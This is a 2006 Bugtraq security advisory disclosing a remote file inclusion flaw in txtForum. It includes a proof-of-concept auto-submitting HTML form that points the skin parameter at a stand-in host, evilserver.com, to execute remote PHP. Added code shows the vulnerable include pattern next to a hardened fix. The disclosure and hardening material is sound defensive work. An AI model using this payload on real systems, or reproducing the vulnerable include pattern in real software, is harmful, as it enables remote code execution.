Message-ID: <20060309144109.20884.qmail@securityfocus.com>
Date: 9 Mar 2006 14:41:09 -0000
From: enji@...lab.tuwien.ac.at
To: bugtraq@...urityfocus.com
Subject: txtForum: Script Injection Vulnerability


===========================================================
txtForum: Script Injection Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-004, March 9, 2006
===========================================================


Affected applications
----------------------

txtForum (http://sourceforge.net/projects/txtforum1)

Versions 1.0.4-dev and prior.


Description
------------

The file common.php contains an include statement on line 46 that uses the SKIN constant, which is defined earlier from the $skin variable. Under the following conditions, an attacker can inject arbitrary PHP code into the application:

- register_globals has to be active
- remote file inclusion has to be allowed

An attacker only needs a code path through the application that does not initialize the $skin variable; no forum account is required. Here is an example of an attack page:

<form action="http://localhost/txtforum104/login.php" method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<!-- the skin parameter becomes $skin via register_globals on a path that never sets it -->
<input type="text" name="skin" value="http://evilserver.com"/>
<input type="submit">
</form>
<script type="text/javascript">
  document.forms[0].submit();
</script>

This causes the code in http://evilserver.com/header.tpl to be executed. Further exploitation may be possible, since similar include statements also appear on lines 53 and 61.
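As an added illustration (not txtForum's own code and not part of the advisory), the following PHP reconstructs the include pattern described above as a hypothetical and places a hardened version beside it. The skins directory layout, the allow-list of skin names and all function names are assumptions made for this example. The vulnerable variant depends on register_globals and remote file inclusion being enabled (allow_url_fopen on PHP of that era, allow_url_include on PHP 5.2 and later), exactly the preconditions the advisory names.

```php
<?php
// Added example, not txtForum code: the include pattern the advisory describes
// (hypothetical reconstruction) next to a hardened replacement.
// Assumed layout: skins/<name>/header.tpl. The allow-list below is constructed.

// --- Vulnerable pattern (hypothetical reconstruction) ---
// With register_globals=On, a request parameter skin=http://evilserver.com
// populates $skin on any code path that never assigns it. With remote file
// inclusion enabled, include() then fetches and executes the remote header.tpl.
function vulnerable_header(): void
{
    if (!defined('SKIN')) {
        // $skin was expected to be set earlier; on some paths it never is,
        // so the request-supplied value is used as-is.
        define('SKIN', $GLOBALS['skin']);
    }
    include SKIN . '/header.tpl';   // remote URL or traversal path reaches include()
}

// --- Hardened pattern ---
const SKIN_DIR = __DIR__ . '/skins';
const DEFAULT_SKIN = 'default';
const ALLOWED_SKINS = ['default', 'dark', 'classic'];   // constructed allow-list

function resolve_skin(?string $requested): string
{
    // 1. Read the parameter explicitly instead of relying on register_globals.
    // 2. Always initialise: a missing value falls back to the default skin.
    // 3. Allow-list the value: neither a URL nor "../" can pass this check.
    if ($requested === null || !in_array($requested, ALLOWED_SKINS, true)) {
        return DEFAULT_SKIN;
    }
    return $requested;
}

function hardened_header(): void
{
    $skin = resolve_skin($_POST['skin'] ?? $_GET['skin'] ?? null);
    $base = realpath(SKIN_DIR);
    $real = realpath(SKIN_DIR . '/' . $skin . '/header.tpl');
    // Second layer: the resolved file must lie inside the skins directory,
    // so a careless later edit of the allow-list still cannot escape it.
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(500);
        exit('skin template not available');
    }
    include $real;
}
```

The hardened variant removes each precondition independently: the parameter is read from $_POST/$_GET rather than through register_globals, it is always initialised, and it is checked against an allow-list so that no URL or traversal sequence ever reaches include(); the realpath() check is a defence-in-depth layer. Server-wide, setting register_globals = Off and allow_url_fopen / allow_url_include = Off in php.ini removes the preconditions for this class of bug regardless of application code.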


Solution
---------

There is no solution to this issue yet.

Timeline:

March 2, 2006:
Vulnerability reported to and acknowledged by the developer (I.Konforti).
A fix is not planned.

March 9, 2006:
Advisory submission.


References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-004.txt


Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at

